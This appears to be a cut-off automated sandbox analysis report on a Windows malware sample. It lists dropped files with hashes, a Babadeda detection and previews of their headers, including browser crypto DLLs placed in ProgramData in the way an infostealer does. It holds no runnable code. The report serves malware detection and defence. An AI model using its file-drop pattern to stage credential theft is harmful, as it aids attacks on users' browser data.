SHA-512:	13490FC7C447ECCE9207E88FDF3088CFE4E08ADA87D6EE75A0DCDC6888FEC752F673CF6ABD0AF9564AC3C0748CA0E9FCCF74A2512900EDAF04B8E0A9254CC6D6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.9.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E4D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.443616826469011
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfJg77aI9aImvWpW8VY3Ym8M4J6gMpVFoX+q8NS7Yrga5BA5Yd:uIjfBI79N7VPJjXWrg4BuYd
MD5:	A5209E552A8AF2D35B8A2D6F7A66C688
SHA1:	4C127B27D4FD1BA5AE7117CD70F56BD47ADE1CA0
SHA-256:	931DA70266E4F1940C04413E60A01DB0224E9FE95BC61BC94B6EDB166C9D09F2
SHA-512:	7ED816D1FC85395EFE8C9F4527C9DC4D843E4E30C39E5D5CC24409F7E79FF0EFF15B5F38C6E4EDB8E4B85632A592FF56229524594C2DE67FCDB1C1CE8B68AAF2
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428232" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DD7.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Jul 26 18:09:23 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	60314
Entropy (8bit):	2.6409301531316745
Encrypted:	false
SSDEEP:	384:grm4ZV5od1UkEa8kGr1VLT5Iu4oRgGHd01N:gq4xoPUkEOiDLooOw01
MD5:	4609ECAAD4D5A314F60F5FA5B81E837C
SHA1:	C4398C5F37CD34DA7B32F5F5318D2AA302576931
SHA-256:	434AF29A7354AF4D9476F18D890E9BA2BE3957F86EA4355407C172D6A702E9E2
SHA-512:	A331431CF87B3877652BAA60EC4A726ACEEDD12AC379EA6614F7DB365B2155659C3F605B0CCE626213AAA4B437FBFC532C52054CAB800DB48421EFDB2AD184E5
Malicious:	false
Preview:	MDMP..a..... .......S.f............4...............<............7..........T.......8...........T............_...............&...........(..............................................................................eJ......h)......GenuineIntel............T.......l...9.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7EF2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8312
Entropy (8bit):	3.691572797386992
Encrypted:	false
SSDEEP:	192:R6l7wVeJuCLh6o6YEIIESUYKgmfB1FJsbpDy89bkysfqMm:R6lXJP6o6YEOSUYKgmfRJckxfw
MD5:	1F15DAAF4714B952D30A57E73A9235B4
SHA1:	689E2F63C0F40E108FCAF0096278B47BA3286581
SHA-256:	C4D06678F7636D439D70CEB5AF4E0FAA112798C4D96592A55688F50154485C22
SHA-512:	5C1B3B55C786CFAD587C867282B40EE40C0F5919DAB3CC0F81BFB64D270672B8E3AC43344351328FCC2768602EED13D2EE7137A98F85C6F30BB7C0D35F927338
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F41.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.423366578024563
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfJg77aI9aImvWpW8VYrYm8M4JWcF9+q8Wb58SBPEd:uIjfBI79N7VjJ3hXBPEd
MD5:	1EA0109C6B916B050B1C460C71B02F3B
SHA1:	B02319ADB097FFA50CACF5C937E6F861A92622C7
SHA-256:	C55942E54F4F8EF58A68DD830BA8BB3FCD4FC05C0F55D4E83DBE4A5CC70E4DA6
SHA-512:	66F8F437F368B1ACCBCB8072325DF170B64D2F05CDFF1C2FEC786F2C6220E7DA3A36E0A5690586A18ABC7EC5E5A7E93F21D299B4A63B603823F23B4604450492
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428232" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\active-update.xml (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (1216), with no line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.522776215816692
Encrypted:	false
SSDEEP:	24:L4pKXAbXetstZOGv3m4CHeiQBRvSRPEYn+/YA3oZgm7mJJA1KXbB746NLbF:16SW30+i+1SRsYnWYAywJM65F
MD5:	B9D94D944C00AFAA42F367792C6B73BA
SHA1:	C34B7A7F8691013DD75BC63F0919701A88B5D7E4
SHA-256:	C581835131AD495F280C41B92151C24F22427AF38F2698ED898C265E4D4BD0EF
SHA-512:	63FF5488842318ABDDCCA747BC6151E185179F5FF464621354DA1965A06E0D050671463822F944CCAA1F4A75A2F915762F33FCD4A57DACFFE37594FB78417E61
Malicious:	false
Preview:	<?xml version="1.0"?><updates xmlns="http://www.mozilla.org/2005/app-update"><update xmlns="http://www.mozilla.org/2005/app-update" appVersion="127.0" buildID="20240606181944" channel="release" detailsURL="https://www.mozilla.org/en-US/firefox/127.0/releasenotes/" displayVersion="127.0" installDate="1722022037795" isCompleteUpdate="true" name="Firefox 127.0" previousAppVersion="118.0.1" promptWaitTime="691200" serviceURL="https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml" type="minor" actions="showURL" openURL="https://www.mozilla.org/firefox/127.0/whatsnew/?oldversion=%OLD_VERSION%&utm_medium=firefox-desktop&utm_source=update&utm_campaign=127"><patch size="69776808" type="complete" URL="https://download.mozilla.org/?product=firefox-127.0-complete&os=win64&lang=en-US" selected="true" state="downloading" hashFunction="s

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\active-update.xml.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (1216), with no line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.522776215816692
Encrypted:	false
SSDEEP:	24:L4pKXAbXetstZOGv3m4CHeiQBRvSRPEYn+/YA3oZgm7mJJA1KXbB746NLbF:16SW30+i+1SRsYnWYAywJM65F
MD5:	B9D94D944C00AFAA42F367792C6B73BA
SHA1:	C34B7A7F8691013DD75BC63F0919701A88B5D7E4
SHA-256:	C581835131AD495F280C41B92151C24F22427AF38F2698ED898C265E4D4BD0EF
SHA-512:	63FF5488842318ABDDCCA747BC6151E185179F5FF464621354DA1965A06E0D050671463822F944CCAA1F4A75A2F915762F33FCD4A57DACFFE37594FB78417E61
Malicious:	false
Preview:	<?xml version="1.0"?><updates xmlns="http://www.mozilla.org/2005/app-update"><update xmlns="http://www.mozilla.org/2005/app-update" appVersion="127.0" buildID="20240606181944" channel="release" detailsURL="https://www.mozilla.org/en-US/firefox/127.0/releasenotes/" displayVersion="127.0" installDate="1722022037795" isCompleteUpdate="true" name="Firefox 127.0" previousAppVersion="118.0.1" promptWaitTime="691200" serviceURL="https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml" type="minor" actions="showURL" openURL="https://www.mozilla.org/firefox/127.0/whatsnew/?oldversion=%OLD_VERSION%&utm_medium=firefox-desktop&utm_source=update&utm_campaign=127"><patch size="69776808" type="complete" URL="https://download.mozilla.org/?product=firefox-127.0-complete&os=win64&lang=en-US" selected="true" state="downloading" hashFunction="s

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\updates\0\update.status

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	12
Entropy (8bit):	3.084962500721156
Encrypted:	false
SSDEEP:	3:ZKRLs:ZH
MD5:	21B14FA7F5DEED372D093DE77DB5C795
SHA1:	D017845A0C7C9900FB5D8ADBD3D78948CC686410
SHA-256:	EC6C7C37BE67A0E4443C2A14B2BB45414FA992D0AEE701D18E8B30DD6F99731A
SHA-512:	E043B349DEAE6AAA23372E00A09C6145C5682DAB37CB284D84C4CCBCE6AF01917BB42AA907581116C83EE255CC64115112067701344EEC2BA810AF8D70AFD99A
Malicious:	false
Preview:	downloading.

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse Filename: IRqsWvBBMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: 1lKbb2hF7fYToopfpmEvlyRN.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 6SoKuOqyNh.exe, Detection: malicious, Browse Filename: IRqsWvBBMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: JGKjBsQrMc.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\1000003002\ee7a49fbf0.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91648
Entropy (8bit):	6.753443800102075
Encrypted:	false
SSDEEP:	1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxwTQOq:Hq6+ouCpk2mpcWJ0r+QNTBfv6T2
MD5:	2DE90BE7036903B103DCAA9B3CF3E2E8
SHA1:	F5BBC22473AE0C4F7536BFD531465B518B58A5D6
SHA-256:	64AC805D6B90DD9585E787A6F3169757B5A610940B5A74FC0453094AF727D251
SHA-512:	DDED961AF68F44794D53AC8F9C45FF3BE4B0B36D5270B81E0ACB769BB5423021DB58D52C87B7578B53F2AA454C8FCA0CC31313E593A8C41F409F2E1073B07554
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\1000003002\ee7a49fbf0.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................\|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2b3e1df9-4f5c-4026-9de4-3c6037b001f0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	47198
Entropy (8bit):	6.090651169490398
Encrypted:	false
SSDEEP:	768:mM7X2zt1jOXtXi3zahc9Y8z0uhDO6vP6OUHxcSCRbAiHPor+YNgisz6nCAo2GouG:mMSzMtXija+9YZ60gHPordgisziRo2hV
MD5:	2F1EB45F303F6AF30E31133118B4E03A
SHA1:	190A494DEBE75E4A0F14334DB77FD4D8F4E74DBF
SHA-256:	D5AF7891E19D0B593BCB8D739435E204EEEA813E8096036C0CD1E42672EBC481
SHA-512:	B6BFD04271835FAD55A466A76227867CCCC3A099B66383BCF1EA9538CAE86FB3DDCDA70E8495DF3B7C483EAB7EA7881B816D7D90BC9D1BA33B1470A08FE24551
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm3rXSyzABnWdKBG+Ijlx7hEE4QTzo+AB6fnDLLJBpo7PKv8Ob367/KjUg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\428cd943-140d-427e-b85b-a228242a1e6f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44604
Entropy (8bit):	6.096146104820881
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBFwushDO6vP6OUjZcfu+tU7bcGoup1Xl3jVzXr4CW:z/Ps+wsI7ynEr60/chu3VlXr4CRo1
MD5:	9B5FC6073AA7696D486735E3FD63DAF8
SHA1:	B5A7B77ACDE23523CF7B2135F82396EF4199FCD4
SHA-256:	C80E197BB242608615E98D8A45988A49A8CD61D000D43E910002E014303F2164
SHA-512:	D5955F8DB5AA58C02A411EA1AF67C0CCED7D072930758B63B2DA7080364565C56689A138422A362C781D9CFE78FF02008CD1D5C5C41A35A900E203CEEE2C7B8D
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\49f74ceb-e6b5-4e79-83a9-65a2fa144df5.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
